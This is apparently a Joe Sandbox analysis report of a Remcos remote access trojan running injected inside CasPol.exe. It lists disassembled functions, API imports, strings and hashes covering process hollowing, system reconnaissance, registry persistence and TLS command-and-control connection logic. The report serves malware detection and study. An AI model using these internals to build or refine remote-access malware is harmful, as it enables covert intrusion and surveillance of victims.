GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
GetProcAddress.KERNEL32(00000000), ref: 0041BE08
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
GetProcAddress.KERNEL32(00000000), ref: 0041BE19
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
GetProcAddress.KERNEL32(00000000), ref: 0041BE29
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
GetProcAddress.KERNEL32(00000000), ref: 0041BE63
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
GetProcAddress.KERNEL32(00000000), ref: 0041BE73

Strings

EnumDisplayMonitors, xrefs: 0041BDD2
NtResumeProcess, xrefs: 0041BE40
GetExtendedUdpTable, xrefs: 0041BE65
GetProcessImageFileNameW, xrefs: 0041BCFD, 0041BD02, 0041BD22
Psapi, xrefs: 0041BD03
GlobalMemoryStatusEx, xrefs: 0041BD6A
shcore, xrefs: 0041BD38
GetSystemTimes, xrefs: 0041BDFA
GetExtendedTcpTable, xrefs: 0041BE50
ntdll, xrefs: 0041BD60, 0041BE30, 0041BE3A, 0041BE4A
NtUnmapViewOfSection, xrefs: 0041BD5B
Shlwapi, xrefs: 0041BE0C
kernel32, xrefs: 0041BD6F, 0041BD74, 0041BD7F, 0041BD8F, 0041BDB3, 0041BDFF, 0041BE20
user32, xrefs: 0041BD4C, 0041BDC3, 0041BDD7, 0041BDEB
GetMonitorInfoW, xrefs: 0041BDE6
IsUserAnAdmin, xrefs: 0041BD9A
SetProcessDEPPolicy, xrefs: 0041BDAE
GetComputerNameExW, xrefs: 0041BD8A
SetProcessDpiAwareness, xrefs: 0041BD32, 0041BD37, 0041BD4B
NtSuspendProcess, xrefs: 0041BE2B
GetConsoleWindow, xrefs: 0041BE1B
Shell32, xrefs: 0041BD9F
IsWow64Process, xrefs: 0041BD7A
Kernel32, xrefs: 0041BD23
EnumDisplayDevicesW, xrefs: 0041BDBE
Iphlpapi, xrefs: 0041BE55, 0041BE5F, 0041BE6A

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 384173800-625181639
Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500

Sleep.KERNELBASE(00000BB8), ref: 0040E603
ExitProcess.KERNEL32 ref: 0040E672

Strings

override, xrefs: 0040E574
pth_unenc, xrefs: 0040E565, 0040E5AC, 0040E619
BG, xrefs: 0040E560
5.3.0 Pro, xrefs: 0040E5DE, 0040E64B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.3.0 Pro$override$pth_unenc$BG
API String ID: 2281282204-3981147832
Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF

Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32(?), ref: 00404946
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040495C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA

Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C

Function 0041A7B2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790

Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF

Strings

Access Level: , xrefs: 0040E047
XCG, xrefs: 0040DC4E
@CG, xrefs: 0040DC07
Remcos Agent initialized, xrefs: 0040DD8C
XCG, xrefs: 0040DB75
del, xrefs: 0040E094, 0040E0F4
Software\, xrefs: 0040D865
dCG, xrefs: 0040DFC4
exepath, xrefs: 0040DC34, 0040DCDE
(CG, xrefs: 0040D904
XCG, xrefs: 0040DF93
XCG, xrefs: 0040DF27
XCG, xrefs: 0040DF67
licence, xrefs: 0040DD25
Exe, xrefs: 0040D8B1
XCG, xrefs: 0040DD01
User, xrefs: 0040E038
XCG, xrefs: 0040D838
XCG, xrefs: 0040DECB
XCG, xrefs: 0040DEF4
BG, xrefs: 0040DBC0
Administrator, xrefs: 0040E02C
XCG, xrefs: 0040DB1D
XCG, xrefs: 0040DE78
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0040D788, 0040DBB1
BG, xrefs: 0040DBF5
BG, xrefs: 0040DC1C
XCG, xrefs: 0040DEA3
XCG, xrefs: 0040DAE9
(CG, xrefs: 0040D8A7
BG, xrefs: 0040DBB6
XCG, xrefs: 0040DDBF
BG, xrefs: 0040DCF6
XCG, xrefs: 0040DDD6
@CG, xrefs: 0040DCBE
Inj, xrefs: 0040D977, 0040D98E
del, xrefs: 0040E078
0DG, xrefs: 0040D914
XCG, xrefs: 0040D7FF
license_code.txt, xrefs: 0040D7EF
`=G, xrefs: 0040DF48

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
API String ID: 2830904901-3665108517
Opcode ID: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
Opcode Fuzzy Hash: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Function 00413FD4 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 813
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
WSAGetLastError.WS2_32 ref: 00414249
Sleep.KERNELBASE(00000000,00000002), ref: 00414B88

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

name, xrefs: 0041441A
@CG, xrefs: 004143F4
Connecting | , xrefs: 004141C0
XCG, xrefs: 004143DC
>G, xrefs: 00414499
XCG, xrefs: 00414001
Connection Error: , xrefs: 0041425A
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00414474
| , xrefs: 004141CA, 00414310
Connection Error: Unable to create socket, xrefs: 004142A4
%I64u, xrefs: 004143AD
>G, xrefs: 004144D7
BG, xrefs: 004144B0
Disconnected, xrefs: 00414AF8
dCG, xrefs: 004145AF
hlight, xrefs: 00414447
`=G, xrefs: 0041454A
XCG, xrefs: 00414B4F
Connected | , xrefs: 0041430B
TLS Off, xrefs: 00414193, 004141A6
5.3.0 Pro, xrefs: 0041457C
TLS On , xrefs: 004141A1

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
API String ID: 524882891-2450167416
Opcode ID: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
Opcode Fuzzy Hash: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004042A5
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

TLS Error 2, xrefs: 0040431A
TLS Error 3, xrefs: 0040439D
Connection Refused, xrefs: 0040443E
TLS Error 1, xrefs: 004042FC
TLS Authentication Failed, xrefs: 0040435E
TLS Handshake... | , xrefs: 004042C9
Connection Failed: , xrefs: 0040440C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
closesocket.WS2_32(000000FF), ref: 0040481F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04

Strings

ProgramData, xrefs: 0040C9C9
AppData, xrefs: 0040C9BB
Temp, xrefs: 0040C8D0
\SysWOW64, xrefs: 0040C96A
WinDir, xrefs: 0040C905, 0040C927, 0040C979
\system32, xrefs: 0040C918
ProgramFiles, xrefs: 0040C9D8
SystemDrive, xrefs: 0040C8FB
UserProfile, xrefs: 0040C9C2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C

Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F

StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9

Strings

0JG, xrefs: 0041A4A2
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041A487, 0041A491, 0041A4CF
(32 bit), xrefs: 0041A511
(64 bit), xrefs: 0041A516, 0041A520
ProductName, xrefs: 0041A482
CurrentBuildNumber, xrefs: 0041A4CA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-3211212173
Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714

Strings

pth_unenc, xrefs: 004126D6
HgF, xrefs: 00412703

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: HgF$pth_unenc
API String ID: 1818849710-3662775637
Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

Strings

TUF, xrefs: 004127D9, 004127FB, 004127DC

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: TUF
API String ID: 1818849710-3431404234
Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
GetLastError.KERNEL32 ref: 0040BEF1

Strings

(CG, xrefs: 0040BED7

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: (CG
API String ID: 1925916568-4210230975
Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
RegCloseKey.KERNELBASE(?), ref: 0041255F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
